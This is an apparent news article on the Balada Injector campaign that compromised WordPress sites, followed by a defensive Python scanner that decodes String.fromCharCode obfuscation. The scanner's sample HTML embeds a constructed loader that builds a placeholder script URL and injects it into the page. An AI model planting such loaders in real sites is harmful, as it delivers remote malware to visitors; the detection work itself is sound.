Balada Injector Malware infected over 1 million WordPress websites
A campaign that has been running continuously since 2017 to spread malware known as Balada Injector is believed to have infected over one million WordPress websites.
The extensive attack, according to GoDaddy’s Sucuri, “leverages all known and recently discovered theme and plugin vulnerabilities” to compromise WordPress websites. The attacks are known to occur in waves roughly every two weeks.
According to security researcher Denis Sinegubko, this campaign can be recognised by its preference for String.fromCharCode obfuscation, its use of recently registered domain names hosting malicious scripts on random subdomains, and its redirects to numerous fraud websites.
Those fraud websites host bogus tech support pages, fake lottery winnings, and malicious CAPTCHA pages that urge users to enable notifications (“Please Allow to verify, that you are not a robot”) so that spam adverts can be delivered.
In the intervening years, the Balada Injector has used over 100 domains and a variety of techniques to exploit well-known security holes (such as HTML injection and Site URL), with the attackers mostly seeking to steal database credentials from the wp-config.php file.
The attacks are also designed to read or download arbitrary site files, such as database dumps, log and error files and backups, and to search for tools like adminer and phpmyadmin that site administrators may have left behind after completing maintenance tasks. Ultimately, the malware enables the creation of phoney WordPress admin users, data harvesting from the hosts’ underlying infrastructure, and the creation of backdoors for ongoing access.
In most cases, these websites belong to the same webmaster as the hijacked site and share the same server account and file permissions, according to Sinegubko.
If these attack vectors turn out to be blocked, the admin password is brute-forced using a list of 74 predetermined credentials.
In addition to using String.fromCharCode as an obfuscation method, the activity directs victims to booby-trapped URLs that trick them into enabling push notifications by impersonating a CAPTCHA check and serving misleading content.
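As an added example that is not part of the original article or of any Sucuri tooling, the following scanner decodes literal String.fromCharCode(...) calls found in site files so a defender can review what an obfuscated snippet actually resolves to; the embedded page fragment and its domain are constructed placeholders, not indicators from the campaign.

```python
import re
from typing import Optional

# Matches String.fromCharCode(...) calls whose argument list has no nested
# parentheses; calls built from variables or expressions are reported as
# undecodable so they are not silently skipped.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([^()]*?)\s*\)")


def decode_charcodes(arg_list: str) -> Optional[str]:
    """Decode a comma-separated list of numeric char codes (decimal or hex).

    Returns None if any argument is not a plain numeric literal, so the
    caller can flag the call for manual review instead of guessing.
    """
    chars = []
    for raw in arg_list.split(","):
        token = raw.strip()
        if not token:
            continue
        try:
            chars.append(chr(int(token, 0)))  # int(..., 0) accepts 104 and 0x68
        except ValueError:
            return None
    return "".join(chars)


def scan_for_fromcharcode(text: str) -> list:
    """Return (decoded_or_None, suspicious) for each String.fromCharCode call.

    A call is marked suspicious when it cannot be decoded statically or when
    the decoded text looks like a remote script URL or injected markup.
    """
    findings = []
    for match in FROMCHARCODE_RE.finditer(text):
        decoded = decode_charcodes(match.group(1))
        suspicious = decoded is None or any(
            marker in decoded.lower()
            for marker in ("://", "<script", "document.write", ".js")
        )
        findings.append((decoded, suspicious))
    return findings


# Constructed sample of an injected page fragment: a loader that assembles a
# script URL from char codes, followed by a harmless decoy call.
SAMPLE_HTML = (
    '<script>var s=document.createElement("script");'
    "s.src=String.fromCharCode(104,116,116,112,115,58,47,47,99,100,110,46,"
    "101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,120,46,106,115);"
    "document.head.appendChild(s);</script>"
    "<script>var t=String.fromCharCode(0x48,0x69);</script>"
)
```

Running scan_for_fromcharcode over a site's theme, plugin and uploaded JS files surfaces the decoded loader URLs for review against the domains the site legitimately uses.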
More than half of the discovered websites had malicious JS code injected into them, according to Unit 42 analysts. One strategy employed by the campaign’s operators was to insert malicious JS code into commonly used JS files (such as jQuery), which are likely to be loaded on the home pages of compromised websites.
Legitimate users of the website may thus be easier to target, since they are the most likely to visit the home page.
Author: Sanghamitra Sethy